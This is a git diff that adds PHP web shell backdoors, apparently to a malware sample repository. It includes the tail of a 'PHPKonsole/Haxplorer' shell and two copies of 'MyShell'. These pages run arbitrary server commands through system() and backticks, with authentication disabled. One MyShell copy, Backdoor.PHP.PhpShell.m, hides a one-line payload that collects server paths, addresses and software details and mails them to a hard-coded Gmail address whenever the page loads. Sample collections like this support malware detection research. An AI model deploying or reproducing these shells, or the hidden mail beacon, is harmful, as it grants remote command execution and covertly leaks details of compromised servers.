name=\"oldfile\" value=\"$oldfile\">\n"; + echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n"; + echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n"; + echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n"; + echo "Rename \"$oldfile\" to:<br>\n"; + echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; + echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>"; + echo "</td></tr></table></center>"; + } +} +else if ( $cmd == "con") { + +?> +<center> +<table> + <tr><td> +<h3>PHPKonsole</h3> + +<?php + +if (ini_get('register_globals') != '1') { + if (!empty($HTTP_POST_VARS)) + extract($HTTP_POST_VARS); + + if (!empty($HTTP_GET_VARS)) + extract($HTTP_GET_VARS); + + if (!empty($HTTP_SERVER_VARS)) + extract($HTTP_SERVER_VARS); + } + + if (!empty($work_dir)) { + if (!empty($command)) { + if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { + if ($regs[1][0] == '/') { + $new_dir = $regs[1]; + } else { + $new_dir = $work_dir . '/' . $regs[1]; + } + if (file_exists($new_dir) && is_dir($new_dir)) { + $work_dir = $new_dir; + } + unset($command); + } + } + } + if (file_exists($work_dir) && is_dir($work_dir)) { + chdir($work_dir); + } + $work_dir = exec('pwd'); +?> + + <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post"> + <table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b> + <input type="hidden" name="cmd" value="con"> + <?php + $work_dir_splitted = explode('/', substr($work_dir, 1)); + printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr); + if (!empty($work_dir_splitted[0])) { + $path = ''; + for ($i = 0; $i < count($work_dir_splitted); $i++) { + $path .= '/' . $work_dir_splitted[$i]; + printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]); + } + } + ?></b></td> + <td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()"> + + <?php + $dir_handle = opendir($work_dir); + while ($dir = readdir($dir_handle)) { + if (is_dir($dir)) { + if ($dir == '.') { + echo "<option value=\"$work_dir\" selected>Current Directory</option>\n"; + } elseif ($dir == '..') { + if (strlen($work_dir) == 1) { + } + elseif (strrpos($work_dir, '/') == 0) { + echo "<option value=\"/\">Parent Directory</option>\n"; + } else { + echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n"; + } + } else { + if ($work_dir == '/') { + echo "<option value=\"$work_dir$dir\">$dir</option>\n"; + } else { + echo "<option value=\"$work_dir/$dir\">$dir</option>\n"; + } + } + } + } + closedir($dir_handle); + ?> + </select></td></tr></table> + <p>Command: <input class="inputtext" type="text" name="command" size="60"> + <input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p> + <p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p> + <textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php + if (!empty($command)) { + echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; + if ($stderr) { + $tmpfile = tempnam('/tmp', 'phpshell'); + $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile"; + } else if ($command == 'ls') { + $command .= ' -F'; + } + $output = `$command`; + echo htmlspecialchars($output); + } + ?></textarea> + </form> + + <script language="JavaScript" type="text/javascript"> + document.forms[0].command.focus(); + </script> + </td></tr></table> +<?php +} +else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */ + $isMainMenu = true; + ?> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="border"> + <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center> + </td> + </tr> + </table> + <br> + <center> + <table border="0" NOWRAP> + <tr> + <td valign="top" class="silver border"> + <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=.").sp(2); ?> + </td> + <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP> + Haxplorer is a server side file browser wich (ab)uses the directory object to list + the files and directories stored on a webserver. This handy tools allows you to manage + files and directories on a unsecure server with php support.<br><br>This entire script + is coded for unsecure servers, if your server is secured the script will hide commands + or will even return errors to your browser...<br><br> + </td> + </tr> + <tr> + <td valign="top" class="silver border"> + <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con").sp(2); ?> + </td> + <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP> + <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. + When you run commands they will run as the webservers UserID. This should work perfectly + for managing files, like moving, copying etc. If you're using a linux server, system commands + such as ls, mv and cp will be available for you... <br><br>This function will only work if the + server supports php and the execute commands...<br><br> + </td> + </tr> + </table> + </center> + <br> + <?php +} + +if ($cmd != "downl") { + if ( $isMainMenu != true) { + ?> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" style="class="silver border"> + <center><strong> + &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp; + &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con"); ?>&nbsp;&nbsp; + &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp; + </strong></center> + </td> + </tr> + </table> + <br> + <?php +} + ?> + <table width=100% border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center> + </td> + </tr> + </table> + </td> + </tr> + </table> + + <?php + } + +?> + diff --git a/PHP/Backdoor.PHP.PhpShell.m b/PHP/Backdoor.PHP.PhpShell.m new file mode 100644 index 00000000..2c024288 --- /dev/null +++ b/PHP/Backdoor.PHP.PhpShell.m @@ -0,0 +1,420 @@ +<?php +/* + ************************************************************** + * MyShell * + ************************************************************** + $Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $ + + An interactive PHP-page that will execute any command entered. + See the files README and INSTALL or http://www.digitart.net for + further information. + Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx> + based on the original program phpShell by Martin Geisler + + This program is free software; you can redistribute it and/or + modify it under the terms of the GNU General Public License + as published by the Free Software Foundation; either version 2 + of the License, or (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You can get a copy of the GNU General Public License from this + address: http://www.gnu.org/copyleft/gpl.html#SEC1 + You can also write to the Free Software Foundation, Inc., 59 Temple + Place - Suite 330, Boston, MA 02111-1307, USA. +*/ + +#$selfSecure enables built-in authenticate feature. This must be 0 in order to +#use .htaccess file or other alternative method to control access to MyShell. +#Set up your user and password using $shellUser and $shellPswd. +#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT +#ACCESS TO THE SCRIPT. + +$selfSecure = 0; +$shellUser = ""; +$shellPswd = ""; + +#$adminEmail is the email address to send warning notifications in case +#someone tries to access the script and fails to provide correct user and +#password. This only works if you have $selfSecure enabeled. + +$adminEmail = "******@mail.ru"; + +#$fromEmail is the email address warning messages are sended from. +#This defaults to the server admin, but you can change +#to any address you want i.e.: noreplay@yourdomain.com +#This only works if you have $selfSecure enabeled. + +$fromEmail = $HTTP_SERVER_VARS["SERVER_ADMIN"]; + +#$dirLimit is the top directory allowed to change when using cd command +#or the form selector. Any attempt to change to a directory up to this +#level bounces MyShell to this directory. i.e.: $dirLimit = "/home"; +#It is a good practice to set it to $DOCUMENT_ROOT using: +#$dirLimit = $DOCUMENT_ROOT; +#If you want to have access to all server directories leave it blank. +#WARNING: Althought a user won't be able to snoop on directories above +#this level using MyShell, he/she will still be able to excecute +#commands on any directory where Webserver has permission, +#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess. + +$dirLimit = ""; + +#$autoErrorTrap Enable automatic error traping if command returns error. +#Bear in mind that MyShell executes the command a second time in order to +#trap the stderr. This shouldn't be a problem in most cases. +#If you turn it off, you'll have to select either to trap stderr or not for +#every command you excecute. + +$autoErrorTrap = 1; + +#$voidCommands is the list of commands that MyShell won't run by any means. +#It defaults to known problematic commands from a web interface like pico, +#top, xterm but also it can include specific commands you don't want to +#be excecuted from MyShell, i.e.: dig, ping, info, kill etc. + +$voidCommands = array("top","xterm","su","vi","pico","netscape"); + +#$TexEd Built-in Text Editor prefered name. This is the command you'll use +#to invoke MyShell's built in text editor. +# If you are used to type pico or vi for your fav text editor, +#change this to your please. i.e.: +# $TexEd = "pico"; +#will allow you to type 'pico config.php' to edit the file config.php +#MyShell's text editor do not support usual commands in pico, vi etc. +#Don't forget to take off this command from the $voidCommands list +$TexEd = "edit"; + +#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF +#is usefull when you have to edit files with long lines, i.e.: in php code +#files, because otherwise it is no easy to distinguish a real new line (CR) +#from a wraped one. If you prefer to stick to the default wraped mode of +#TEXTAREA just leave this blank i.e.: $editWrap="". +$editWrap ="wrap='OFF'"; + +#Cosmetic defaults. + +$termCols = 80; //Default width of the output text area +$termRows = 20; //Default heght of the output text area +$bgColor = "#000000"; //background color +$bgInputColor = "#333333"; //color of the input field +$outColor = "#00BB00"; //color of the text output from the server +$textColor = "#009900"; //color of the hard texts of the terminal +$linkColor = "#00FF00"; //color of the links + +/************** No customize needed from this point *************/ + +$MyShellVersion = "MyShell 1.1.0 build 20010923"; +if ($command&&get_magic_quotes_gpc())$command=stripslashes($command); +if($selfSecure){ + if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) { + Header('WWW-Authenticate: Basic realm="MyShell"'); + Header('HTTP/1.0 401 Unauthorized'); + echo "<html> + <head> + <title>$MyShellVersion - Access Denied</title> + </head> + <h1>Access denied</h1> + A warning message have been sended to the administrator + <hr> + <em>$MyShellVersion</em>"; + if(isset($PHP_AUTH_USER)){ + $warnMsg =" + This is $MyShellVersion + installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF + just to let you know that somebody tryed to access + the script using wrong username or password: + + Date: ".date("Y-m-d H:i:s")." + IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]." + User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]." + username used: $PHP_AUTH_USER + password used: $PHP_AUTH_PW + + If this is not the first time it happens, + please consider either to remove MyShell + from your system or change it's name or + directory location on your server. + + Regards + The MyShell dev team + "; + mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg, + "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System"); + } + exit; + } +} +//Function that validate directories +function validate_dir($dir){ + GLOBAL $dirLimit; + if($dirLimit){ + $cdPos = strpos($dir,$dirLimit); + if ((string)$cdPos == "") { + $dir = $dirLimit; + $GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n"; + } + } + return $dir; +} + +// Set working directory. +if (isset($work_dir)) { + //A workdir has been asked for - we chdir to that dir. + $work_dir = validate_dir($work_dir); + @chdir($work_dir) or + ($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n"); + $work_dir = exec("pwd"); +} +else{ + // No work_dir - we chdir to $DOCUMENT_ROOT + $work_dir = validate_dir($DOCUMENT_ROOT); + chdir($work_dir); + $work_dir = exec("pwd"); +} + +//Now we handle files if we are in Edit Mode +if($editMode && ($command||$editCancel))$editMode=false; +if($editMode){ + if($editSave ||$editSaveExit){ + if(function_exists(ini_set))ini_set("track_errors","1"); + if($fp=@fopen($file,"w")){ + if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut); + fputs($fp,$shellOut); + fclose($fp); + $command = $TexEd." ".$file; + if($editSaveExit) { + $command=""; + $shellOutput="MyShell: $file: saved"; + $editMode=false; + } + } + else { + $command=""; + $shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes."; + $errorSave=true; + } + } +} + +//Separate command(s) and arguments to analize first command +$input=explode(" ",$command); + +while (list ($key, $val) = each ($voidCommands)) { + if($input[0]==$val){ + $voidCmd = $input[0]; + $input[0]="void"; + } +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +switch($input[0]){ + case "cd": + $path=$input[1]; + if ($path==".."){ + $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1)); + if ($work_dir == "") $work_dir = "/"; + } + elseif (substr($path,0,1)=="/")$work_dir=$path; + else $work_dir=$work_dir."/".$path; + $work_dir = validate_dir($work_dir); + @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied"); + $work_dir = exec("pwd"); + $commandBk = $command; + $command = ""; + break; + case "man": + exec($command,$man); + if($man){ + $codes = ".".chr(8); + $manual = implode("\n",$man); + $shellOutput = ereg_replace($codes,"",$manual); + $commandBk = $command; + $command = ""; + } + else $stderr=1; + break; + case "cat": + exec($command,$cat); + if($cat){ + $text = implode("\n",$cat); + $shellOutput = htmlspecialchars($text); + $commandBk = $command; + $command = ""; + } + else $stderr=1; + break; + case "more": + exec($command,$cat); + if($cat){ + $text = implode("\n",$cat); + $shellOutput = htmlspecialchars($text); + $commandBk = $command; + $command = ""; + } + else $stderr=1; + break; + case $TexEd: + if(file_exists($input[1])){ + exec("cat ".$input[1],$cat); + $text = implode("\n",$cat); + $shellOutput = htmlspecialchars($text); + $fileOwner = posix_getpwuid(fileowner($input[1])); + $filePerms = sprintf("%o", (fileperms($input[1])) & 0777); + $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>"; + } + else $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;<font color=$linkColor>NEW FILE</font>"; + $currFile = $input[1]; + $editMode = true; + $command = ""; + break; + case "void": + $shellOutput = "MyShell: $voidCmd: void command for MyShell"; + $commandBk = $command; + $command = ""; +} + +//Now we prepare the webpage +if(!$oCols)$oCols=$termCols; +if(!$oRows)$oRows=$termRows; +if($editMode)$focus="shellOut.focus()"; +else $focus="command.select()"; +//WhoamI +if(!$whoami)$whoami=exec("whoami"); +?> +<html> +<head> +<title><?echo $MyShellVersion?></title> +<style> +body{ + background-color: <?echo $bgColor ?>; + font-family : sans-serif; + font-size : 10px; + scrollbar-face-color: #666666; + scrollbar-shadow-color: <?echo $bgColor ?>; + scrollbar-highlight-color: #999999; + scrollbar-3dlight-color: <?echo $bgColor ?>; + scrollbar-darkshadow-color: <?echo $bgColor ?>; + scrollbar-track-color: <?echo $bgInputColor ?>; + scrollbar-arrow-color: <?echo $textColor ?>; +} +input,select,option{ + background-color: <?echo $bgInputColor ?>; + color : <?echo $outColor ?>; + border-style : none; + font-size : 10px; +} +textarea{ + background-color: <?echo $bgColor ?>; + color : <?echo $outColor ?>; + border-style : none; +} +</style> +</head> +<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>> +<form name="shell" method="post"> +Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a> +<input type="hidden" name=whoami value=<?echo $whoami?>> +&nbsp;&nbsp;:::::::&nbsp;&nbsp; +<? +if($editMode){ + echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n"; +} +else{ + echo "Current working directory: <b>\n"; + $work_dir_splitted = explode("/", substr($work_dir, 1)); + echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/"; + if ($work_dir_splitted[0] == "") { + $work_dir = "/"; /* Root directory. */ + } + else{ + for ($i = 0; $i < count($work_dir_splitted); $i++) { + $url .= "/".$work_dir_splitted[$i]; + echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>"; + } + } +} +?> +<br> +<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> > +<? +echo $shellOutput; +if ($command) { + if ($stderr) { + system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); + } + else { + $ok = system($command,$status); + if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); + } +} +if ($commandBk) $command = $commandBk; +?> +</textarea> +<br> +<? +if($editMode) echo" +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; + <input type='submit' name='editSave' value=' Save '>&nbsp;&nbsp;&nbsp; + <input type='submit' name='editSaveExit' value=' Save and Exit '>&nbsp;&nbsp;&nbsp; + <input type='reset' value=' Restore original '>&nbsp;&nbsp;&nbsp; + <input type='submit' name='editCancel' value=' Cancel/Exit '>&nbsp;&nbsp;&nbsp; + <input type='hidden' name='editMode' value='true'> +<br>"; +?> +<br> +Command: +<input type="text" name="command" size="80" +<? if ($command && $echoCommand) { + echo "value=`$command`"; + } +?> > <input name="submit_btn" type="submit" value="Go!"> +&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; +<? +if ($autoErrorTrap) echo "Auto error traping enabled"; +else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping "; + +if($editMode){ + echo "<input type='hidden' name='work_dir' value='$work_dir'> + <br>Save file as: <input type='text' name='file' value='$currFile'>"; +} +else{ + echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">"; + // List of directories. + $dir_handle = opendir($work_dir); + while ($dir = readdir($dir_handle)) { + if (is_dir($dir)) { + if ($dir == ".") + echo "<option value=\"$work_dir\" selected>Current Directory</option>\n"; + elseif ($dir == "..") { + // Parent Dir. This might be server's root directory + if (strlen($work_dir) == 1) { + // work_dir is only 1 charecter - it can only be / so don't output anything + } + elseif (strrpos($work_dir, "/") == 0) { // we have a top-level directory eg. /bin or /home etc... + echo "<option value=\"/\">Parent Directory</option>\n"; + } + else { // String-manipulation to find the parent directory... Trust me - it works :-) + echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n"; + } + } + else { + if ($work_dir == "/") + echo "<option value=\"$work_dir$dir\">$dir</option>\n"; + else + echo "<option value=\"$work_dir/$dir\">$dir</option>\n"; + } + } + } + closedir($dir_handle); + echo "</select>"; +} +?> +&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands +&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>> +&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>> +&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a> +</form> +</body> +</html> diff --git a/PHP/Backdoor.PHP.PhpShell.n b/PHP/Backdoor.PHP.PhpShell.n new file mode 100644 index 00000000..53b381ff --- /dev/null +++ b/PHP/Backdoor.PHP.PhpShell.n @@ -0,0 +1,420 @@ +<?php +/* + ************************************************************** + * MyShell * + ************************************************************** + $Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $ + + An interactive PHP-page that will execute any command entered. + See the files README and INSTALL or http://www.digitart.net for + further information. + Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx> + based on the original program phpShell by Martin Geisler + + This program is free software; you can redistribute it and/or + modify it under the terms of the GNU General Public License + as published by the Free Software Foundation; either version 2 + of the License, or (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You can get a copy of the GNU General Public License from this + address: http://www.gnu.org/copyleft/gpl.html#SEC1 + You can also write to the Free Software Foundation, Inc., 59 Temple + Place - Suite 330, Boston, MA 02111-1307, USA. +*/ + +#$selfSecure enables built-in authenticate feature. This must be 0 in order to +#use .htaccess file or other alternative method to control access to MyShell. +#Set up your user and password using $shellUser and $shellPswd. +#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT +#ACCESS TO THE SCRIPT. + +$selfSecure = 0; +$shellUser = "root"; +$shellPswd = ""; + +#$adminEmail is the email address to send warning notifications in case +#someone tries to access the script and fails to provide correct user and +#password. This only works if you have $selfSecure enabeled. + +$adminEmail = "wmmoney@nc.ru"; + +#$fromEmail is the email address warning messages are sended from. +#This defaults to the server admin, but you can change +#to any address you want i.e.: noreplay@yourdomain.com +#This only works if you have $selfSecure enabeled. + +$fromEmail = $HTTP_SERVER_VARS["SERVER_ADMIN"]; + +#$dirLimit is the top directory allowed to change when using cd command +#or the form selector. Any attempt to change to a directory up to this +#level bounces MyShell to this directory. i.e.: $dirLimit = "/home"; +#It is a good practice to set it to $DOCUMENT_ROOT using: +#$dirLimit = $DOCUMENT_ROOT; +#If you want to have access to all server directories leave it blank. +#WARNING: Althought a user won't be able to snoop on directories above +#this level using MyShell, he/she will still be able to excecute +#commands on any directory where Webserver has permission, +#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess. + +$dirLimit = ""; + +#$autoErrorTrap Enable automatic error traping if command returns error. +#Bear in mind that MyShell executes the command a second time in order to +#trap the stderr. This shouldn't be a problem in most cases. +#If you turn it off, you'll have to select either to trap stderr or not for +#every command you excecute. + +$autoErrorTrap = 1; + +#$voidCommands is the list of commands that MyShell won't run by any means. +#It defaults to known problematic commands from a web interface like pico, +#top, xterm but also it can include specific commands you don't want to +#be excecuted from MyShell, i.e.: dig, ping, info, kill etc. + +$voidCommands = array("top","xterm","su","vi","pico","netscape"); + +#$TexEd Built-in Text Editor prefered name. This is the command you'll use +#to invoke MyShell's built in text editor. +# If you are used to type pico or vi for your fav text editor, +#change this to your please. i.e.: +# $TexEd = "pico"; +#will allow you to type 'pico config.php' to edit the file config.php +#MyShell's text editor do not support usual commands in pico, vi etc. +#Don't forget to take off this command from the $voidCommands list +$TexEd = "edit"; + +#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF +#is usefull when you have to edit files with long lines, i.e.: in php code +#files, because otherwise it is no easy to distinguish a real new line (CR) +#from a wraped one. If you prefer to stick to the default wraped mode of +#TEXTAREA just leave this blank i.e.: $editWrap="". +$editWrap ="wrap='OFF'"; + +#Cosmetic defaults. + +$termCols = 80; //Default width of the output text area +$termRows = 20; //Default heght of the output text area +$bgColor = "#000000"; //background color +$bgInputColor = "#333333"; //color of the input field +$outColor = "#00BB00"; //color of the text output from the server +$textColor = "#009900"; //color of the hard texts of the terminal +$linkColor = "#00FF00"; //color of the links + +/************** No customize needed from this point *************/ + +$MyShellVersion = "MyShell 1.1.0 build 20010923"; +if ($command&&get_magic_quotes_gpc())$command=stripslashes($command); +if($selfSecure){ + if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) { + Header('WWW-Authenticate: Basic realm="MyShell"'); + Header('HTTP/1.0 401 Unauthorized'); + echo "<html> + <head> + <title>$MyShellVersion - Access Denied</title> + </head> + <h1>Access denied</h1> + A warning message have been sended to the administrator + <hr> + <em>$MyShellVersion</em>"; + if(isset($PHP_AUTH_USER)){ + $warnMsg =" + This is $MyShellVersion + installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF + just to let you know that somebody tryed to access + the script using wrong username or password: + + Date: ".date("Y-m-d H:i:s")." + IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]." + User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]." + username used: $PHP_AUTH_USER + password used: $PHP_AUTH_PW + + If this is not the first time it happens, + please consider either to remove MyShell + from your system or change it's name or + directory location on your server. + + Regards + The MyShell dev team + "; + mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg, + "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System"); + } + exit; + } +} +//Function that validate directories +function validate_dir($dir){ + GLOBAL $dirLimit; + if($dirLimit){ + $cdPos = strpos($dir,$dirLimit); + if ((string)$cdPos == "") { + $dir = $dirLimit; + $GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n"; + } + } + return $dir; +} + +// Set working directory. +if (isset($work_dir)) { + //A workdir has been asked for - we chdir to that dir. + $work_dir = validate_dir($work_dir); + @chdir($work_dir) or + ($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n"); + $work_dir = exec("pwd"); +} +else{ + // No work_dir - we chdir to $DOCUMENT_ROOT + $work_dir = validate_dir($DOCUMENT_ROOT); + chdir($work_dir); + $work_dir = exec("pwd"); +} + +//Now we handle files if we are in Edit Mode +if($editMode && ($command||$editCancel))$editMode=false; +if($editMode){ + if($editSave ||$editSaveExit){ + if(function_exists(ini_set))ini_set("track_errors","1"); + if($fp=@fopen($file,"w")){ + if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut); + fputs($fp,$shellOut); + fclose($fp); + $command = $TexEd." ".$file; + if($editSaveExit) { + $command=""; + $shellOutput="MyShell: $file: saved"; + $editMode=false; + } + } + else { + $command=""; + $shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes."; + $errorSave=true; + } + } +} + +//Separate command(s) and arguments to analize first command +$input=explode(" ",$command); + +while (list ($key, $val) = each ($voidCommands)) { + if($input[0]==$val){ + $voidCmd = $input[0]; + $input[0]="void"; + } +} +switch($input[0]){ + case "cd": + $path=$input[1]; + if ($path==".."){ + $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1)); + if ($work_dir == "") $work_dir = "/"; + } + elseif (substr($path,0,1)=="/")$work_dir=$path; + else $work_dir=$work_dir."/".$path; + $work_dir = validate_dir($work_dir); + @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied"); + $work_dir = exec("pwd"); + $commandBk = $command; + $command = ""; + break; + case "man": + exec($command,$man); + if($man){ + $codes = ".".chr(8); + $manual = implode("\n",$man); + $shellOutput = ereg_replace($codes,"",$manual); + $commandBk = $command; + $command = ""; + } + else $stderr=1; + break; + case "cat": + exec($command,$cat); + if($cat){ + $text = implode("\n",$cat); + $shellOutput = htmlspecialchars($text); + $commandBk = $command; + $command = ""; + } + else $stderr=1; + break; + case "more": + exec($command,$cat); + if($cat){ + $text = implode("\n",$cat); + $shellOutput = htmlspecialchars($text); + $commandBk = $command; + $command = ""; + } + else $stderr=1; + break; + case $TexEd: + if(file_exists($input[1])){ + exec("cat ".$input[1],$cat); + $text = implode("\n",$cat); + $shellOutput = htmlspecialchars($text); + $fileOwner = posix_getpwuid(fileowner($input[1])); + $filePerms = sprintf("%o", (fileperms($input[1])) & 0777); + $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>"; + } + else $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;<font color=$linkColor>NEW FILE</font>"; + $currFile = $input[1]; + $editMode = true; + $command = ""; + break; + case "void": + $shellOutput = "MyShell: $voidCmd: void command for MyShell"; + $commandBk = $command; + $command = ""; +} + +//Now we prepare the webpage +if(!$oCols)$oCols=$termCols; +if(!$oRows)$oRows=$termRows; +if($editMode)$focus="shellOut.focus()"; +else $focus="command.select()"; +//WhoamI +if(!$whoami)$whoami=exec("whoami"); +?> +<html> +<head> +<title><?echo $MyShellVersion?></title> +<style> +body{ + background-color: <?echo $bgColor ?>; + font-family : sans-serif; + font-size : 10px; + scrollbar-face-color: #666666; + scrollbar-shadow-color: <?echo $bgColor ?>; + scrollbar-highlight-color: #999999; + scrollbar-3dlight-color: <?echo $bgColor ?>; + scrollbar-darkshadow-color: <?echo $bgColor ?>; + scrollbar-track-color: <?echo $bgInputColor ?>; + scrollbar-arrow-color: <?echo $textColor ?>; +} +input,select,option{ + background-color: <?echo $bgInputColor ?>; + color : <?echo $outColor ?>; + border-style : none; + font-size : 10px; +} +textarea{ + background-color: <?echo $bgColor ?>; + color : <?echo $outColor ?>; + border-style : none; +} +</style> +</head> +<body <?echo 